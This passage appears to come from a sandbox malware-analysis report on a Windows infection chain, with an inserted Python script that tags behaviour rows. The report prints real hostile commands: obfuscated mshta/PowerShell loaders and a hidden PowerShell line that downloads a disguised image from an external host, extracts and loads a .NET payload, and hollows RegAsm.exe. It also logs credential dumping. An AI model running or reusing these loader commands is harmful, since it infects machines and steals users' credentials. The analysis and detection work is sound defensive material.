                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 23_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 23_2_00407EF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 26_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 26_2_00407898
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 17_2_00407CD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_00418981 memset,GetSystemInfo, 21_2_00418981
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00434A8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,21_2_0040DD85
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,17_2_0041CBE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00443355 mov eax, dword ptr fs:[00000030h]17_2_00443355
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_10004AB4 mov eax, dword ptr fs:[00000030h]17_2_10004AB4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,17_2_00411D39
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00434BD8 SetUnhandledExceptionFilter,17_2_00434BD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_0043503C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00434A8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0043BB71
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_100060E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_10002639
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_10002B1C

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3852, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTR
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? 
? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,17_2_0041812A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 17_2_00412132
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00419662 mouse_event,17_2_00419662
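The rows from the FindFirstFile* enumeration loops through the "Memory written" entries above are what a triage script reads off a report like this one: directory walking, IsDebuggerPresent and fs:[30h] (PEB) reads, thread delays, the CreateProcessW, NtUnmapViewOfSection, WriteProcessMemory/NtMapViewOfSection, SetThreadContext, ResumeThread sequence in 17_2_0041812A, and powershell.exe writing a buffer that begins with 4D5A ("MZ") into RegAsm.exe at base 0x400000. The Python below is an added example, not the report's or Joe Sandbox's code: it parses rows of this shape and tags them. Its sample rows are constructed from the lines above with the longest API lists shortened; the thresholds (five GetProcAddress calls, a 60 s sleep cut-off) are the example's own choices; and 922337203685477 ms is TimeSpan.MaxValue expressed in milliseconds, which is what a wait with that timeout reports, so it is separated from the 600000 ms (ten minute) timed sleeps.

```python
"""Tag Joe Sandbox behaviour rows of the shape shown above (added example, not the report's own code)."""
import re
from collections import Counter

# Constructed sample: rows copied from the report above, the long API lists shortened.
SAMPLE_ROWS = [
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_0040928E",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00443355 mov eax, dword ptr fs:[00000030h] 17_2_00443355",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0043BB71",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 600000",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_0041812A GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,17_2_0041812A",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008",
]

ROW_RE = re.compile(r"^Source: (?P<source>.+?) \| (?P<kind>[^:]+): (?P<detail>.*)$")
ADDR_RE = re.compile(r"\d+_\d+_[0-9A-Fa-f]{8}")          # Joe's "<pid>_<stage>_<rva>" function id
MEMWRITE_RE = re.compile(r"^(?P<target>.+?) base: (?P<base>[0-9A-Fa-f]+)(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?$")
DELAY_RE = re.compile(r"delay time: (?P<ms>\d+)")

# Order-sensitive skeleton of process hollowing; one of WRITE_APIS must also appear.
HOLLOWING_CHAIN = ["CreateProcessW", "NtUnmapViewOfSection", "SetThreadContext", "ResumeThread"]
WRITE_APIS = {"WriteProcessMemory", "NtMapViewOfSection"}
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000   # 922337203685477: TimeSpan.MaxValue in milliseconds


def parse_row(line):
    """Split a row into its Source column, the behaviour kind and the detail text."""
    m = ROW_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised row: {line!r}")
    return m.groupdict()


def apis_of(body):
    """API names in a 'Code function' body; the function id Joe repeats after the last comma is dropped."""
    parts = [p.strip() for p in body.split(",")]
    return [p for p in parts if p and not ADDR_RE.fullmatch(p)]


def in_order(seq, wanted):
    """True when every name in `wanted` occurs in `seq` in that relative order (gaps allowed)."""
    it = iter(seq)
    return all(w in it for w in wanted)


def classify_code_function(detail):
    """Tags for one 'Code function' row."""
    body = ADDR_RE.sub("", detail, count=1).strip()     # drop the leading function id
    apis = apis_of(body)
    tags = set()
    if any(a.startswith("FindFirstFile") for a in apis):
        tags.add("file-enumeration")
    if "IsDebuggerPresent" in apis:
        tags.add("anti-debug")
    if "fs:[00000030h]" in body:        # TEB+0x30 is the PEB pointer on 32-bit Windows (BeingDebugged, NtGlobalFlag)
        tags.add("peb-access")
    if apis.count("GetProcAddress") >= 5:   # threshold is this example's choice
        tags.add("dynamic-api-resolution")
    if in_order(apis, HOLLOWING_CHAIN) and WRITE_APIS & set(apis):
        tags.add("process-hollowing")
    return tags


def classify_delay(ms):
    """Separate an effectively infinite wait from a timed sleep that could be stalling a sandbox."""
    if ms == TIMESPAN_MAX_MS:
        return "infinite-wait"
    return "long-sleep" if ms >= 60_000 else "short-sleep"   # 60 s cut-off is this example's choice


def parse_memory_write(source, detail):
    """Decode a 'Memory written' row: remote target, base address and whether the bytes start with 'MZ'."""
    m = MEMWRITE_RE.match(detail)
    if not m:
        raise ValueError(f"unrecognised memory write: {detail!r}")
    magic = m.group("magic") or ""
    return {
        "target": m.group("target"),
        "base": int(m.group("base"), 16),
        "cross_process": m.group("target").lower() != source.lower(),
        "pe_header": magic.upper().startswith("4D5A"),
    }


def triage(rows):
    """Tag counts for the rows, plus every cross-process write that plants a PE header."""
    tags = Counter()
    injections = []
    for line in rows:
        row = parse_row(line)
        if row["kind"] == "Code function":
            tags.update(classify_code_function(row["detail"]))
        elif row["kind"] == "Thread delayed":
            tags[classify_delay(int(DELAY_RE.search(row["detail"]).group("ms")))] += 1
        elif row["kind"] == "Memory written":
            mw = parse_memory_write(row["source"], row["detail"])
            if mw["cross_process"] and mw["pe_header"]:
                injections.append((row["source"], mw["target"], mw["base"]))
    return tags, injections


if __name__ == "__main__":
    found, injected = triage(SAMPLE_ROWS)
    print(dict(found))
    for src, dst, base in injected:
        print(f"PE image written by {src} into {dst} at {base:#x}")
```

The hollowing check is deliberately order-sensitive: NtUnmapViewOfSection followed by a write and then SetThreadContext/ResumeThread is the pattern, whereas the same APIs in another order (a debugger, an unpacker of its own image) are not. The "Memory written" rows give the second, independent signal: a foreign process writing a buffer that starts with MZ at 0x400000, the default image base of a 32-bit executable, is the hollowed image going in.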
                Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'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'+[chAr]34+'))')))"
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'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'+[chAr]34+'))')))"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS"
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE61B.tmp" "c:\Users\user\AppData\Local\Temp\sepiowy3\CSC80F6A6947D640689146C75DBBC3F89.TMP"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\beufwmopeibmjckcxn"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\beufwmopeibmjckcxn"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; 